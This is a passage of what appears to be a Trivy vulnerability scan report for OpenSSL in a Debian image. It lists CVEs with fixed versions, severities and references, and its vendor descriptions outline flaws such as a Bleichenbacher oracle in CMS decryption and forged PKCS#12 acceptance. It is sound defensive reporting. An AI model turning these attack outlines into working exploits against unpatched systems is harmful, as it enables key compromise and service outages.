"https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/323f0b6e7d530a4cb4336d50c88cb70f3ac2a451", + "https://github.com/openssl/openssl/commit/787a6dfba81b7b09c1e05ab31396c0cd7c36b3f7", + "https://github.com/openssl/openssl/commit/7ac4715234ee72d9f3c93426a2c08554b5b771af", + "https://github.com/openssl/openssl/commit/843c9b94ca9c2ed248bb30127bb4f3d7af0d607c", + "https://github.com/openssl/openssl/commit/983d54b5cce8d16147548ed1a37892d1720bbab6", + "https://nvd.nist.gov/vuln/detail/CVE-2026-45445", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://www.cve.org/CVERecord?id=CVE-2026-45445" + ], + "PublishedDate": "2026-06-09T17:17:18.993Z", + "LastModifiedDate": "2026-06-16T02:57:17.483Z" + }, + { + "VulnerabilityID": "CVE-2026-34180", + "VendorIDs": [ + "DSA-6335-1" + ], + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34180", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:74bc184131ba9b25c79f30bd0442315de082e209ab794191e382f4cd6a824d13", + "Title": "openssl: OpenSSL: Heap buffer over-read in ASN.1 decoding can lead to denial of service or information disclosure.", + "Description": "Issue summary: Parsing a crafted DER-encoded ASN.1 structure with a primitive\nelement whose content exceeds 2 gigabytes in length may cause a heap buffer\nover-read on 64-bit Unix and Unix-like platforms.\n\nImpact summary: The heap buffer over-read may crash the application (Denial of\nService) or to load into the decoded ASN.1 object contents of memory beyond the\nend of the input buffer. More typically such ASN.1 elements would instead be\ntruncated.\n\nAn integer truncation in OpenSSL's ASN.1 decoder causes the content length of\nan ASN.1 primitive element to be mishandled when it exceeds 2 gigabytes. In the\nworst case the truncated length is treated as a request to scan the binary\ncontent for a terminating zero byte, possibly causing OpenSSL to read either\nless than or beyond the end of the allocated buffer.\n\nApplications that pass attacker-supplied data to d2i_X509(), d2i_PKCS7(), or\nany other d2i_* decoding function are affected. OpenSSL's own command-line\ntools are not vulnerable, as data read through the BIO layer is checked before\nit reaches the affected code. The issue only affects 64-bit Unix and Unix-like\nplatforms; 32-bit platforms and 64-bit Windows are not affected.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue,\nas the affected code is outside the OpenSSL FIPS module boundary.", + "Severity": "LOW", + "CweIDs": [ + "CWE-125" + ], + "VendorSeverity": { + "alma": 3, + "photon": 3, + "redhat": 1, + "rocky": 3, + "ubuntu": 1 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:H", + "V3Score": 5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-34180", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/1c6908e4fa5fa568752221d8eaf561a809751e5d", + "https://github.com/openssl/openssl/commit/cbe418ae978539cf14a398a207dba834c0e93e83", + "https://github.com/openssl/openssl/commit/d93853c42110d6319e3df07842b488cb9f7ac5ff", + "https://github.com/openssl/openssl/commit/da5d62af75f69d6fbf7803743d7c56ac75461e43", + "https://github.com/openssl/openssl/commit/f696c73c3e61b8c502d040af62e690c060908a16", + "https://nvd.nist.gov/vuln/detail/CVE-2026-34180", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://ubuntu.com/security/notices/USN-8414-2", + "https://www.cve.org/CVERecord?id=CVE-2026-34180" + ], + "PublishedDate": "2026-06-09T17:17:04.6Z", + "LastModifiedDate": "2026-06-15T18:13:21.753Z" + }, + { + "VulnerabilityID": "CVE-2026-34181", + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34181", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:c72e3f4ae91ed47689ae37c3061817bd58e84bad8098985524e600d892e8cf33", + "Title": "openssl: PKCS#12 Files with PBMAC1 Are Accepted with Short HMAC Keys", + "Description": "Issue Summary: The PKCS#12 file processing fails to perform sufficient input\nvalidation for files that use Password-Based Message Authentication Code 1\n(PBMAC1) integrity mechanism allowing a certificate and private key forgery.\n\nImpact Summary: An attacker impersonating a user can cause a service reading\nPKCS#12 files to accept forged certificates and private keys with a 1 in 256\nprobability.\n\nIf a service accepting PKCS#12 files is using passwords for authenticating\nthe received files, the attacker can create unencrypted PKCS#12 files that\nuse PBMAC1 authentication that specifies an HMAC key of only one byte, allowing\nthem to craft a file that will be accepted with a 1 in 256 probability.\nThat would then cause the service to accept a certificate and private key\ncontrolled by the attacker.\n\nThe FIPS modules are not affected by this issue, as the affected code is\noutside the OpenSSL FIPS module boundary.", + "Severity": "LOW", + "CweIDs": [ + "CWE-354" + ], + "VendorSeverity": { + "alma": 3, + "photon": 3, + "redhat": 1, + "rocky": 3, + "ubuntu": 1 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 6.3 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-34181", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/0300eb9ddce7a0895bf301a4b0c03a9da2313a0f", + "https://github.com/openssl/openssl/commit/79eb76a937e474bb7610a0a3dc57131dc8dc6610", + "https://github.com/openssl/openssl/commit/85dcbb3abaa4878af5c8fbbe11bce708fcf984a7", + "https://github.com/openssl/openssl/commit/ec36f2417c4ddd8cabce4b4a60a3d7a7365f2d81", + "https://nvd.nist.gov/vuln/detail/CVE-2026-34181", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://www.cve.org/CVERecord?id=CVE-2026-34181" + ], + "PublishedDate": "2026-06-09T17:17:04.74Z", + "LastModifiedDate": "2026-06-15T18:13:13.673Z" + }, + { + "VulnerabilityID": "CVE-2026-42766", + "VendorIDs": [ + "DSA-6335-1" + ], + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-42766", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:d84dfd7947f41183b29bd1fd9f5f8c713dba0c1cfb28a8177294194a2f8d0157", + "Title": "openssl: Possible NULL Dereference in Password-Based CMS Decryption", + "Description": "Issue summary: A specially crafted password-encrypted CMS message\ncan trigger a NULL pointer dereference during CMS decryption.\n\nImpact summary: This NULL pointer dereference leads to an application crash\nand a Denial of Service.\n\nThe CMS PasswordRecipientInfo.keyDerivationAlgorithm field is defined as\nOPTIONAL in the ASN.1 specification and may therefore be absent in specially\ncrafted inputs. During the password-based CMS decryption the OpenSSL\nCMS implementation dereferences this field without first checking whether it\nwas present.\n\nAn attacker who supplies such a CMS message to an application performing\npassword-based CMS decryption can trigger an application crash, leading to\na Denial of Service.\n\nApplications that process password-encrypted CMS messages may be affected.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.", + "Severity": "LOW", + "CweIDs": [ + "CWE-476" + ], + "VendorSeverity": { + "alma": 3, + "photon": 2, + "redhat": 1, + "rocky": 3, + "ubuntu": 1 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-42766", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/056d06c1918fafbb98c1c85a02e4c47cc4e199ce", + "https://github.com/openssl/openssl/commit/12bc26ffb3a2be728c9b86e1cae277de5b33dfa4", + "https://github.com/openssl/openssl/commit/3ff64913615d648cfbb6a6f1cf5529ae7ea829d7", + "https://github.com/openssl/openssl/commit/ab52d88cb5374876d59aee3c91f9e4ccce2b7ce4", + "https://github.com/openssl/openssl/commit/da26f368732b83e40e9d356fe61c3d3aaab6d2e8", + "https://nvd.nist.gov/vuln/detail/CVE-2026-42766", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://ubuntu.com/security/notices/USN-8414-2", + "https://www.cve.org/CVERecord?id=CVE-2026-42766" + ], + "PublishedDate": "2026-06-09T17:17:07.97Z", + "LastModifiedDate": "2026-06-15T18:25:08.923Z" + }, + { + "VulnerabilityID": "CVE-2026-42767", + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-42767", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:233c141db53032014c67f055091cfef8b75671c364ce58b9cf7fe68294393fb0", + "Title": "openssl: NULL Pointer Dereference in CRMF EncryptedValue Decryption", + "Description": "Issue summary: An attacker-controlled CMP (Certificate Management Protocol)\nserver could trigger a NULL pointer dereference in a CMP client application.\n\nImpact summary: A NULL pointer dereference causes a crash of the\napplication and a Denial of Service.\n\nAn attacker controlling a CMP server (or acting as a man-in-the-middle) could\ncraft a CMP response containing a CRMF (Certificate Request Message Format)\nCertRepMessage with an EncryptedValue structure where the symmAlg field\nhas an algorithm OID but no parameters field. When the OpenSSL CMP client\nprocesses this response, the NULL dereference occurs, causing a crash of\nthe CMP client.\n\nApplications that process untrusted CMP/CRMF messages may be affected.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.", + "Severity": "LOW", + "CweIDs": [ + "CWE-476" + ], + "VendorSeverity": { + "alma": 3, + "photon": 2, + "redhat": 1, + "rocky": 3, + "ubuntu": 1 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-42767", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/61a86a8cd73546c9fea916f3d304c1293e05c046", + "https://github.com/openssl/openssl/commit/665d5254083affde9982efca7c41dd01cacc8774", + "https://github.com/openssl/openssl/commit/810b722f772652ad48042bcc7ab07e3414b11d0f", + "https://github.com/openssl/openssl/commit/b90ff3b1bd33b1c18e6a09936d097c2eddef8873", + "https://github.com/openssl/openssl/commit/e6f912907fc2ec82a0fd07aae55172c5e5e3d90d", + "https://nvd.nist.gov/vuln/detail/CVE-2026-42767", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://www.cve.org/CVERecord?id=CVE-2026-42767" + ], + "PublishedDate": "2026-06-09T17:17:08.093Z", + "LastModifiedDate": "2026-06-16T02:58:39.02Z" + }, + { + "VulnerabilityID": "CVE-2026-42768", + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-42768", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:a865ea4ee06fa99747f2eb9be23391ee9f55fe3fab50b59197cb745d2787d18d", + "Title": "openssl: Multi-RecipientInfo Bleichenbacher Oracle in CMS_decrypt() and PKCS7_decrypt()", + "Description": "Issue summary: The CMS_decrypt and PKCS7_decrypt functions are vulnerable to\nBleichenbacher-style attack when an attacker is able to provide the CMS or\nS/MIME messages and observe the error code and/or decryption output.\n\nImpact summary: The Bleichenbacher-style attack allows an attacker to use the\nvictim's vulnerable application as a way to decrypt or sign messages with the\nvictim's private RSA key.\n\nThe attack is possible in 2 variants.\n\n1. The decryption API (CMS_decrypt(), PKCS7_decrypt()) is used without\nproviding the recipient certificate. In this case OpenSSL iterates over every\nKeyTransRecipientInfo (KTRI) without stopping at the first success.\n\nAn attacker who authors a message with two KTRI entries — the first one\nwrapping a real CEK under the victim's public key, the second with an\narbitrary probe ciphertext — obtains opportunity to iterate the 2nd KTRI to\nget a valid PKCS#1 v1.5 padding if the error code of the application is\navailable.\n\nThat is a Bleichenbacher oracle (Bleichenbacher, CRYPTO '98): an\nadaptive-chosen-ciphertext side channel from which the attacker decrypts any\nRSA ciphertext to the victim's key or forges any PKCS#1 v1.5 signature under\nit.\n\n2. When the decryption API (CMS_decrypt(), PKCS7_decrypt()) is provided with\nthe recipient certificate, and the recipient is not found, a random\nkey is substituted.\n\nAn attacker who authors a message and is able to compare both error code and\nthe result of the decryption, can mount a Bleichenbacher oracle.\n\nWe are not aware of any applications that provide a remote attacker\nan opportunity to mount an attack described in these scenarios. We consider\nthe existence of such application very unlikely, and for this reason this\nCVE has been evaluated as Low severity.\n\nTo avoid these attacks, when RSA PKCS#1 v1.5 Key Transport is in use, the\ninvoked EVP_PKEY_decrypt() will use the implicit rejection mechanism described\nin draft-irtf-cfrg-rsa-guidance. In previous OpenSSL releases the implicit\nrejection was explicitly 